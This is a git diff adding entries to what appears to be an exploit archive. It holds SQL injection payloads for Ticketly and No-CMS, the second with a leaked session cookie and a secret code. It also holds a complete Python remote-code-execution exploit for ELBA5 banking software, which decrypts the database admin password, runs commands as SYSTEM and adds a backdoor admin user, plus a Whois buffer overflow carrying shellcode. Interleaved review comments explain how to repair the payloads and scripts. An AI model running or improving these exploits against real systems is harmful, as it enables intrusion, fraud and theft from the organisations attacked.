+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22%22&description=Test
+---
+
+# 3. Payloads
+# 3.1 Payload (boolean-based blind)
+name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
+
+# 3.2 Payload (error-based)
+name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
+
+#3.3 Payload (AND/OR time-based blind)
+name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
+
+# 4. Vulnerables resources and parameters
+# /action/addproject.php (description, name, category_id and description)
+# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
+# /reports.php (kind_id y status_id)
+
+# 5. Timeline
+# 24/07/2018 Discovery
+# 24/07/2018 Contact with developer
+# 24/07/2018 Solution to vulnerability as pending
+# 02/11/2018 Request ID CVE
+# 04/11/2018 Assigned CVE-2018-18923
+# 05/11/2018 Public disclosure
+
+# 6. References:
+# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
\ No newline at end of file
diff --git a/exploits/php/webapps/45903.txt b/exploits/php/webapps/45903.txt
new file mode 100644
index 000000000..01bd474ba
--- /dev/null
+++ b/exploits/php/webapps/45903.txt
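Review bot: The PoC text and payloads disagree on the quote character: section 2.1 says "add `'` in name parameter" while the request actually sends `%22` (a double quote), and payloads 3.2 and 3.3 open with a typographic `”` (U+201D) in `name=Test”`, which the database treats as ordinary string content rather than a delimiter, so those two payloads will not break out of the literal as printed. Use the ASCII `"` from payload 3.1 in all three, and reword 2.1 to "add `"` in name parameter". Section 4 also lists `description` twice for `addproject.php` and spells `kind_id` as `king_id` for `addticket.php`, and all three payloads exercise only `name` — one working example per claimed parameter, or a note that the rest were confirmed with an automated tool, would substantiate the "Multiple" in the title. It would also help readers to state whether `addproject.php` requires an authenticated session, since the requests carry no cookie.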
@@ -0,0 +1,42 @@
+# Exploit Title: No-Cms 1.0 - 'order_by' SQL Injection
+# Date: 2018-11-28
+# Exploit Author: Loading Kura Kura
+# Vendor Homepage: https://github.com/goFrendiAsgard/No-CMS
+# Software Link: https://codeload.github.com/goFrendiAsgard/No-CMS/zip/master
+# Tested on: Win10/Kali Linux
+# Google Dork: n/a
+# Version: n/a
+# CVE :
+
+# No-CMS is a CMS-framework.
+# No-CMS is a basic and "less-assumption" CMS with some default features such as
+# user authorization (including third party authentication), menu, module and theme management.
+# It is fully customizable and extensible, you can make your own module and your own themes.
+# It provide freedom to make your very own CMS, which is not provided very well by any other CMS.
+
+# POC
+#Sqli injection { order_by[0] }
+
+POST /nocms/main/manage_privilege/index/export HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/nocms/main/manage_privilege
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+Connection: close
+Cookie: bb9865483ae270ceba27539501d10599=rf0at4ehbd1ttckd85skvf17ssq4dfh2; crud_page_a36781f1e31bde68770f40381aad7df6=1; per_page_a36781f1e31bde68770f40381aad7df6=25; hidden_ordering_a36781f1e31bde68770f40381aad7df6=asc; hidden_sorting_a36781f1e31bde68770f40381aad7df6=index; search_text_a36781f1e31bde68770f40381aad7df6=; search_field_a36781f1e31bde68770f40381aad7df6=; 3c158ec1144ba8bb0dd8a7ca03988b5c=e4p2j92lle03vpp6ccuv2c8dro86ebep; crud_page_710a7d8c82ae37e845c3da5df1073379=1; per_page_710a7d8c82ae37e845c3da5df1073379=25; hidden_ordering_710a7d8c82ae37e845c3da5df1073379=desc; hidden_sorting_710a7d8c82ae37e845c3da5df1073379=date; search_text_710a7d8c82ae37e845c3da5df1073379=dd; search_field_710a7d8c82ae37e845c3da5df1073379=sec0e67fc; __secret_code=d282ef263719ab842e05
+Upgrade-Insecure-Requests: 1
+
+search_text=&search_field=/**/&per_page=25&order_by[0]=[INJECT HERE]&order_by[1]=&page=1
+
+=========================
+Regards
+Loading Kura Kura
+thanks To :
+Siluman IWAK
+Siluman Cupatkai
+Siluman TUMO
+dan kamu sayang :*
\ No newline at end of file
diff --git a/exploits/windows/remote/45905.py b/exploits/windows/remote/45905.py
new file mode 100755
index 000000000..00db837d3
--- /dev/null
+++ b/exploits/windows/remote/45905.py
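Review bot: The request targets `/main/manage_privilege/index/export` with an authenticated session cookie, so this is a post-authentication injection and the advisory should state which role is required (the module name suggests an administrative privilege-management screen, which would sharply limit impact) instead of leaving `Version: n/a` and `CVE :` empty; the affected commit or release should be pinned since the software link is a moving `master` zip. `order_by[0]` lands in an `ORDER BY` clause, which cannot be protected by a bound parameter, so the fix to recommend is an allow-list of sortable column names plus `asc`/`desc`, not escaping; and a concrete value showing what `[INJECT HERE]` was during testing (e.g. a time-based `SLEEP` expression and the observed delay) would let readers verify the claim. The `Cookie` header also carries two session IDs and a `__secret_code` value from the test instance; replace them with placeholders before publication.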
@@ -0,0 +1,216 @@ +# Exploit Title: ELBA5 5.8.0 - Remote Code Execution +# Date: 2018-11-16 +# Exploit Author: Florian Bogner +# Vendor Homepage: https://www.elba.at +# Vulnerable Software: https://www.elba.at/eBusiness/01_template1/1206507788612244132-1206515595789049657_1206515641959948315-1292519691128454196-NA-38-NA.html +# Version: up to 5.8.0 +# Tested on: any Windows OS +# Full Writeup: https://bogner.sh/2018/11/0-day-in-elba5s-network-installation-overtaking-your-companys-bank-account/ +# Summary: This exploit has been tested against ELBA5 version 5.7.1 to 5.8.0. It can be used to remotely obtain code +# execution on the ELBA5 server with full SYSTEM level permissions. Additionally, a backdoor user can be added + +Please see attachment for the full python exploit. + +import sys +import hashlib + +try: + import sqlanydb +except: + print("\n") + print("==================================================") + print("This exploit depends on the sqlanydb python module") + print("Run \"pip install sqlanydb\" to install it") + print("==================================================") + print("\n") + raise + +# this should be defined on the cli +DB_HOST=None +ACTION=None + +# The default ELBA port +DB_PORT="2640" + +# The servername to connect to... does not really matter anywhay +DB_SERVERNAME="ELBA5SRV" + +# The initial "connector" database user that is used to obtain the actual DBA credentials +DB_CONNECTOR_UID="connector" +DB_CONNECTOR_PWD="connector" + +# The actual DB user with DBA permissions +DB_DBA_UID="elba" +DB_DBA_PWD=None +DB_DBA_ENCRYPTION_PWD="Af&Pw_dw7$Yd9#" + +def main(): + print("==================================================") + print(" ELBA5 Electronic Banking (https://www.elba.at/)") + print(" Network Installation RCE Exploit") + print("") + print("This exploit has been tested against version 5.7.1") + print("to 5.8.0. 
It can be used to remotely obtain code") + print("execution on the ELBA5 server with full SYSTEM") + print("level permissions.") + print("") + print("Discovered by: Florian Bogner @ Bee IT Security") + print(" florian(at)bee-itsecurity.at") + print("==================================================") + print("") + + if (len(sys.argv)<3): + print_usage() + sys.exit(1) + + # get info from cli + global DB_HOST + global ACTION + + DB_HOST=sys.argv[1] + ACTION=sys.argv[2] + + #### phase 1 + print("[*] Starting phase 1: Obtain & Decrypt DBA password") + DB_DBA_PWD=fetch_db_dba_pwd() + + if (DB_DBA_PWD==None): + print("[-] Something went wrong in phase 1... Exiting") + sys.exit(1) + + print("[+] Received the DBA password: "+DB_DBA_PWD) + + #### phase 2 + print("[*] Starting phase 2: Establishing a DB connection as DBA") + conn = sqlanydb.connect( + uid=DB_DBA_UID, + pwd=DB_DBA_PWD, + servername='ELBA5SRV', + host=''+DB_HOST+':'+DB_PORT + ) + + if (conn==None): + print("[-] Something went wrong in phase 2... Exiting") + sys.exit(1) + + print("[+] Connection established as DBA") + + #### deliver payload + if (ACTION=="addUser"): + print("[*] Starting phase 3: Adding a backdoor user") + add_elba_user(conn); + elif (ACTION=="runCommand"): + print("[*] Starting phase 3: Running command") + run_command(conn); + else: + print("[*] Unknown action "+ACTION+"... Exiting cleanly") + + #### winding down + print("[*] Closing DBA connection") + conn.close() + +def print_usage(): + print("Usage: "+sys.argv[0]+" "); + print(""); + print("target: The system to attack"); + print("actions:"); + print(" * addUser: adds an ELBA Backdoor user to the given install") + print(" * runCommand: A command to run on the target as SYSTEM") + print(" Provide the command to run as a sub argument") + print(" (No output is provided)") + +def run_command(conn): + + if (len(sys.argv)!=4): + print("[-] No command given... 
Exiting cleanly") + return + + CMD=sys.argv[3] + + curs = conn.cursor() + + print("[*] Will try to execute: "+CMD) + curs.execute("CALL xp_cmdshell('"+CMD+"');") + + curs.close() + +def add_elba_user(conn): + USER_TO_ADD = "HACKER" + USER_PASSWORD = "H4cker" + + # check if a user with the given name already exists + print("[*] Checking if the username "+USER_TO_ADD+" is unused") + + curs = conn.cursor() + curs.execute("SELECT * FROM \"elbndba\".\"BEDIENER\" WHERE BEDIENER='"+USER_TO_ADD+"'") + rowset = curs.fetchall() + curs.close() + + if (len(rowset)>0): + print("[-] A user with the name "+USER_TO_ADD+" already exists! Exiting cleanly...") + return + + + + # get the largest current bedienerKey + print("[*] Request the largest current bedienerKey") + curs = conn.cursor() + curs.execute("SELECT MAX(bedienerKey) FROM \"elbndba\".\"BEDIENER\"") + currentBedienerKey = curs.fetchone()[0] + curs.close() + + newBedienerKey=currentBedienerKey+1 + + print("[*] Will use the new bedienerKey "+str(newBedienerKey)) + + + # create password hash + print("[*] Hash the password") + usrdir="USER"+str(newBedienerKey) + string_to_hash=USER_PASSWORD+str(newBedienerKey)+usrdir + + hash = hashlib.sha256(string_to_hash.encode('ascii','replace')).hexdigest() + print("[*] Will use the hash: "+hash) + + # add the user + print("[*] Finally adding the user") + curs = conn.cursor() + + sql = "INSERT INTO \"elbndba\".\"BEDIENER\" (BEDIENER,NAME,ABTEILUNG,PASSWORT,GESPERRT,ADMIN,USRDIR,geloescht,bedienerKey) " + sql += "VALUES ('"+USER_TO_ADD+"','"+USER_TO_ADD+"','','"+hash+"',0,1,'"+usrdir+"',0,"+str(newBedienerKey)+");" + + curs.execute(sql) + + # commit changes + print("[*] Commiting changes") + conn.commit() + + print("[+] Login as "+USER_TO_ADD+" with the password "+USER_PASSWORD) + curs.close() + +# connect to the target host with the "connector" user and extract the dba password +def fetch_db_dba_pwd(): + + target_host=''+DB_HOST+':'+DB_PORT + print("[*] Trying to connect to the target 
server: "+target_host) + + conn = sqlanydb.connect( + uid=DB_CONNECTOR_UID, + pwd=DB_CONNECTOR_PWD, + servername='ELBA5SRV', + host=target_host + ) + + print("[*] Extracting the secret key") + curs = conn.cursor() + curs.execute("SELECT DECRYPT(daten, '"+DB_DBA_ENCRYPTION_PWD+"', 'AES') FROM elbndba.connection") + + # decode the result to a valid utf-8 string + decrypted_pwd=curs.fetchone()[0].decode("utf-8") ; + + curs.close() + conn.close() + + return decrypted_pwd; + +main(); \ No newline at end of file diff --git a/exploits/windows_x86/local/45907.txt b/exploits/windows_x86/local/45907.txt new file mode 100644 index 000000000..7310278cd --- /dev/null +++ b/exploits/windows_x86/local/45907.txt 
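Review bot: The bare line `Please see attachment for the full python exploit.` near the top of the file is not a comment, so the whole script fails to parse with a SyntaxError before `import sys` is ever reached; either prefix it with `#` or drop it. Separately, `run_command` splices the command straight into `curs.execute("CALL xp_cmdshell('"+CMD+"');")`, so any single quote in the command terminates the SQL literal and the call fails (or runs something else); doubling the quotes avoids that, `curs.execute("CALL xp_cmdshell('" + CMD.replace("'", "''") + "');")`. The `if (conn==None)` guards in `main` are presumably dead, since a DB-API connect normally raises on failure rather than returning None, so a `try`/`except` around the connect would be the check that actually reports phase 1/2 errors.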
@@ -0,0 +1,42 @@
+# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
+# Google Dork: [if applicable]
+# Date: 23/11/2018
+# Exploit Author: zephyr
+# Vendor Homepage: http://www.armcode.com
+# Software Link: http://www.armcode.com/downloads/arm-whois.exe
+# Version: 3.11
+# Tested on: Windows Vista Ultimate SP1 x86 unpatched
+# CVE :
+
+# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched
+# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows
+nops = "\x90"*20
+buf = "w00tw00t" + nops + ("\xba\x0e\xc3\xc8\xe6\xdd\xc4\xd9\x74\x24\xf4\x5e\x29"
+"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x01\x21"
+"\x3d\x1a\xf5\x27\xbe\xe3\x05\x48\x36\x06\x34\x48\x2c"
+"\x42\x66\x78\x26\x06\x8a\xf3\x6a\xb3\x19\x71\xa3\xb4"
+"\xaa\x3c\x95\xfb\x2b\x6c\xe5\x9a\xaf\x6f\x3a\x7d\x8e"
+"\xbf\x4f\x7c\xd7\xa2\xa2\x2c\x80\xa9\x11\xc1\xa5\xe4"
+"\xa9\x6a\xf5\xe9\xa9\x8f\x4d\x0b\x9b\x01\xc6\x52\x3b"
+"\xa3\x0b\xef\x72\xbb\x48\xca\xcd\x30\xba\xa0\xcf\x90"
+"\xf3\x49\x63\xdd\x3c\xb8\x7d\x19\xfa\x23\x08\x53\xf9"
+"\xde\x0b\xa0\x80\x04\x99\x33\x22\xce\x39\x98\xd3\x03"
+"\xdf\x6b\xdf\xe8\xab\x34\xc3\xef\x78\x4f\xff\x64\x7f"
+"\x80\x76\x3e\xa4\x04\xd3\xe4\xc5\x1d\xb9\x4b\xf9\x7e"
+"\x62\x33\x5f\xf4\x8e\x20\xd2\x57\xc4\xb7\x60\xe2\xaa"
+"\xb8\x7a\xed\x9a\xd0\x4b\x66\x75\xa6\x53\xad\x32\x02"
+"\x6e\xac\x19\x3b\xd7\xa4\x1c\x26\xe8\x12\x62\x5f\x6b"
+"\x97\x1a\xa4\x73\xd2\x1f\xe0\x33\x0e\x6d\x79\xd6\x30"
+"\xc2\x7a\xf3\x52\x85\xe8\x9f\xba\x20\x89\x3a\xc3")
+
+egghunter = nops + ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + "\x90"*15
+junk = "A"*(672-len(buf+egghunter))
+nseh = "\xeb\xc7\x90\x90"
+seh = "\x57\x22\x41"
+
+payload = junk + buf + egghunter + nseh + seh
+
+f = open("tmp.txt", 'wb')
+f.write(payload)
+f.close()
+print len(payload)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a1d4d608a..4b2022f2b 100644
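Review bot: `seh = "\x57\x22\x41"` is a three-byte overwrite, so the exploit only works if the fourth byte of the handler pointer is supplied by a NUL that the target appends after the file contents, and nothing can ever follow `seh` in the payload; that constraint is nowhere stated. Document it and the address it encodes, e.g. `# 3-byte SEH overwrite: 0x00412257 (high byte comes from the trailing NUL) -- pop/pop/ret presumably in the non-ASLR arm-whois.exe image, nothing may follow it`, since the "(ASLR)" in the title is the only hint at why a partial overwrite was chosen. The script is Python 2 only (`print len(payload)`, byte-string literals) but ships as a .txt with no interpreter hint, so a `#!/usr/bin/env python2` first line would save the next user a failed run under Python 3. `# Google Dork: [if applicable]` is a leftover template placeholder and should read `n/a`.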
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6195,6 +6195,7 @@ id,file,description,date,author,type,platform,port
 45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
 45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
 45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
+45901,exploits/linux/dos/45901.txt,"MariaDB Client 10.1.26 - Denial of Service (PoC)",2018-11-26,strider,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10116,6 +10117,8 @@ id,file,description,date,author,type,platform,port
 45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
 45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
 45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
+45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
+45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16965,6 +16968,8 @@ id,file,description,date,author,type,platform,port
 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,
 45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79
 45851,exploits/java/remote/45851.rb,"Atlassian Jira - Authenticated Upload Code Execution (Metasploit)",2018-11-14,Metasploit,remote,java,2990
+45905,exploits/windows/remote/45905.py,"ELBA5 5.8.0 - Remote Code Execution",2018-11-26,"Florian Bogner",remote,windows,2640
+45909,exploits/hardware/remote/45909.rb,"Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)",2018-11-27,Metasploit,remote,hardware,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40400,3 +40405,8 @@ id,file,description,date,author,type,platform,port
 45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
 45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
 45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80
+45899,exploits/hardware/webapps/45899.txt,"Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials",2018-11-26,Hodorsec,webapps,hardware,
+45900,exploits/php/webapps/45900.txt,"WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting",2018-11-26,En_dust,webapps,php,80
+45902,exploits/php/webapps/45902.txt,"Ticketly 1.0 - 'kind_id' SQL Injection",2018-11-26,"Javier Olmedo",webapps,php,80
+45903,exploits/php/webapps/45903.txt,"No-Cms 1.0 - 'order_by' SQL Injection",2018-11-26,"Loading Kura Kura",webapps,php,80
+45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80